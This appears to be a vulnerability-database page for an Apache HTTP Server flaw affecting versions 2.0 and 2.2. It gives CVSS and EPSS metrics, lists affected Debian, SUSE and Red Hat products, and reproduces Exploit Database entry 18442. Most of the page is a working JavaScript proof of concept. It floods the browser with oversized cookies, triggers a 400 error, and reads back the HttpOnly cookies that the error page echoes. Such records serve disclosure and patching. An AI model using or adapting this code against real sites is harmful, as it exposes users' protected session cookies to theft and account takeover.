Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE Other |
No informations. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
4.3 |
|
AV:N/AC:M/Au:N/C:P/I:N/A:N |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 18442
Publication date : 2012-01-30 23h00 +00:00
Author : pilate
EDB Verified : Yes
// Source: https://gist.github.com/1955a1c28324d4724b7b/7fe51f2a66c1d4a40a736540b3ad3fde02b7fb08
// Most browsers limit cookies to 4k characters, so we need multiple
function setCookies (good) {
// Construct string for cookie value
var str = "";
for (var i=0; i< 819; i++) {
str += "x";
}
// Set cookies
for (i = 0; i < 10; i++) {
// Expire evil cookie
if (good) {
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
}
// Set evil cookie
else {
var cookie = "xss"+i+"="+str+";path=/";
}
document.cookie = cookie;
}
}
function makeRequest() {
setCookies();
function parseCookies () {
var cookie_dict = {};
// Only react on 400 status
if (xhr.readyState === 4 && xhr.status === 400) {
// Replace newlines and match <pre> content
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
if (content.length) {
// Remove Cookie: prefix
content = content[1].replace("Cookie: ", "");
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
// Add cookies to object
for (var i=0; i<cookies.length; i++) {
var s_c = cookies[i].split('=',2);
cookie_dict[s_c[0]] = s_c[1];
}
}
// Unset malicious cookies
setCookies(true);
alert(JSON.stringify(cookie_dict));
}
}
// Make XHR request
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = parseCookies;
xhr.open("GET", "/", true);
xhr.send(null);
}
makeRequest();
Products Mentioned
Configuraton 0
Apache>>Http_server >> Version From (including) 2.0.0 To (excluding) 2.0.65
Apache>>Http_server >> Version From (including) 2.2.0 To (excluding) 2.2.22
Configuraton 0
Debian>>Debian_linux >> Version 5.0
Debian>>Debian_linux >> Version 6.0
Debian>>Debian_linux >> Version 7.0
Configuraton 0
Opensuse>>Opensuse >> Version 11.4
Suse>>Linux_enterprise_server >> Version 10
Suse>>Linux_enterprise_software_development_kit >> Version 10
Configuraton 0
Redhat>>Storage >> Version 2.0
Redhat>>Enterprise_linux_desktop >> Version 6.0
Redhat>>Enterprise_linux_eus >> Version 6.2
Redhat>>Enterprise_linux_server >> Version 6.0
Redhat>>Enterprise_linux_workstation >> Version 6.0
Configuraton 0
Redhat>>Jboss_enterprise_web_server >> Version 1.0.0
Redhat>>Enterprise_linux >> Version 5.0
Redhat>>Enterprise_linux >> Version 6.0
References